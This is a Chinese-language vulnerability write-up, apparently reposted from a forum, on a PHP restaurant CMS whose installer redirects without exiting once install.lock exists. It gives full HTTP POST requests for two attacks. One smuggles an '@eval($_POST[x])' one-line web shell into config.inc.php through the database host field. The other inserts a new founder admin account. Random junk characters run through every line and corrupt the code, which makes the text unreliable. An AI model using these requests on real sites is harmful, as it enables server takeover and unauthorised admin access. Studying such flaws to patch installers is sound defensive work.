问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。4 T: t+ o% [8 F4 A8 [" X* D
" w5 ~$ Z0 o5 N& m0 O- k: g; q<?php9 U+ {% O. k+ G
if(file_exists("../install.lock"))$ v0 ^/ p |" L% J. j/ [$ n
{
# a/ w) {/ z) g1 x header("Location: ../");//没有退出3 R& |6 b% b! U* R6 H
}
0 O8 N. H) S: h2 _! l2 O& F3 I
5 Z/ H5 ]; x* {//echo 'tst';exit;0 [: A7 ~1 I, x( a Z+ ^
require_once("init.php");
2 M/ q; F% a. @! K4 b Oif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
5 a' X4 c- I1 P ^' b{
( Y3 L" m; O' t) I) ]+ x可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。 O/ D. X+ {, i, ?3 n
9 k( j# E+ j0 g4 ]
1、getshell(很危险)2 A `. ^& k) m5 _% ?3 P
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
8 ~, h5 N& [1 n; F; M& I) `{! r. I% r; Q' f) K- c# z
$smarty->assign("step",1);
+ l/ C6 c1 N2 d7 X. W$smarty->display("index.html");7 p! }8 R4 U+ S! M1 f$ I# m
}elseif($_REQUEST['step']==2)
) Y+ T. h D: |{
8 e3 s, n% B5 n6 N $mysql_host=trim($_POST['mysql_host']);& u* A' h& q7 D9 O1 y! p+ V% f
$mysql_user=trim($_POST['mysql_user']);
0 J/ V* d2 b, F! B+ J$ e2 ] $mysql_pwd=trim($_POST['mysql_pwd']);' q5 c/ ?# }; y! s# i7 A
$mysql_db=trim($_POST['mysql_db']);- W, ~! C z+ G3 i" b$ f
$tblpre=trim($_POST['tblpre']);6 A- U1 @: E/ p2 A% V7 x( r
$domain==trim($_POST['domain']); `9 F3 f6 N$ Q, Q5 l
$str="<?php \r\n";- {- v3 ?) X4 f: V& L8 N
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
$ s0 a' @9 u: q$ I- v9 n; i% |/ V0 A; C $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";. P+ h7 Q! x2 ^- R+ w. C
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
/ f0 K. P* \ y% P" _ I$ @/ ^ $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";; k% _5 E4 B0 g% _& Y2 n( g/ K' e
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
! q4 {- d0 d x* T7 [, x3 V $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
$ }+ m( s8 E2 @/ k$ J- {9 U $str.='define("DOMAIN","'.$domain.'");'."\r\n";+ ~" M2 P3 r7 P8 R: H: t% c) w
$str.='define("SKINS","default");'."\r\n";" q: l, {& Y; x7 R6 R! R
$str.='?>';
4 m) ~! u9 _2 i file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
6 N8 J, q0 k. M- D, Y( n上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
5 D1 V- ~3 W2 n" r8 kPOST /canting/install/index.php?m=index&step=2 HTTP/1.1
" [( [4 k$ B Y1 r( IHost: 192.168.80.129. ~5 d7 n* R0 {" j% S3 ?8 y2 t7 v) ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
3 T% w4 `5 X* Z, Z0 b+ c9 ~- bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.80 Q; A' @4 N G5 ?5 j
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3% O% }3 N" z" Z& Q
Accept-Encoding: gzip, deflate% a! j" u2 g& O5 s
Referer: http://192.168.80.129/canting/install/index.php?step=1/ f' t p1 K6 j0 Y
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42 _1 e" J& @1 \9 X
Content-Type: application/x-www-form-urlencoded m: M+ t3 p8 {' s% R8 x- {
Content-Length: 1260 u Q" ]$ }* {+ g+ M7 J( M0 Y) ?5 ^
+ j, m8 J0 R3 V9 j6 \' o: Ymysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
2 g9 w2 `" s7 p- ~7 Y但是这个方法很危险,将导致网站无法运行。
, ?4 C; i8 t; n- j) z0 i [5 q( a1 A$ O9 I" h- y6 i( r
2、直接添加管理员
8 A3 z( P/ J5 x. y' I% Z0 t1 X* @7 a, Q; b, d
elseif($_REQUEST['step']==5)
$ T3 m9 T9 ^7 w{
n& R& N2 ?* ?+ E, m if($_POST)3 p& c/ d9 ~; T5 B m7 z0 i
{ require_once("../config/config.inc.php");
" h' A* D' C0 k4 A $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
. Z! k/ [; c- k# P9 q3 M0 f, T8 _ mysql_select_db(MYSQL_DB,$link);
+ L. {" T' }/ j1 T( N mysql_query("SET NAMES ".MYSQL_CHARSET );) b9 ?! r) \. J7 l) P+ U1 S
mysql_query("SET sql_mode=''");
6 E, t( N6 s P1 n
4 W; V% W* L+ o$ a $adminname=trim($_POST['adminname']);/ P7 t, F( t: w2 v) }( L
$pwd1=trim($_POST['pwd1']);
. a. @: h0 ^, W/ |. z0 j( g# ^5 C $pwd2=trim($_POST['pwd2']);
( H4 b& ?! N; m2 E/ G if(empty($adminname))2 n2 d& s( }5 e1 v
{. m2 |) d# z, H# r
8 F8 g2 ]9 R- t2 x echo "<script>alert('管理员不能为空');history.go(-1);</script>";
& K# _( i( S. y: t exit();
. h8 b' \/ a7 N4 ? }
) k+ x* R. q- s2 z if(($pwd1!=$pwd2) or empty($pwd1))
8 Z2 f' g; U/ R5 R3 }! L0 I! u& a {
* J2 Y/ k& m7 X( ^/ [ echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出7 D8 \+ Q2 \1 S: i9 K
}4 m4 `; j* s. _3 r' i
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员" g* h+ o' c0 o7 [
}
" W6 g2 @9 u8 N; Y- O n0 s B这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:$ P( B' S+ u. \/ t
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
9 B. p/ s# J6 @Host: 192.168.80.129, b- q0 w) @, q/ G3 P$ \
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
! y ]' d6 x7 w# l3 [3 HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 T. g0 |4 ^( O+ |
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.37 d' I+ u8 _" ?7 a8 \# S0 V% I! Q
Accept-Encoding: gzip, deflate" [4 i2 t/ x5 W$ D* R- M
Referer: http://www.2cto.com /canting/install/index.php?step=1
# x i6 M" o0 o8 D& ~; oCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42! c1 C: o/ E0 y. f6 b4 r
Content-Type: application/x-www-form-urlencoded
" [. j* e* @* X4 H" V. H6 L* \( ?Content-Length: 46
1 \. r; F0 d- I : t, o( u7 N7 E f9 V. l9 @/ w
adminname=qingshen&pwd1=qingshen&pwd2=qingshen* d( y1 y1 h0 e3 K. Q, J8 N7 m
|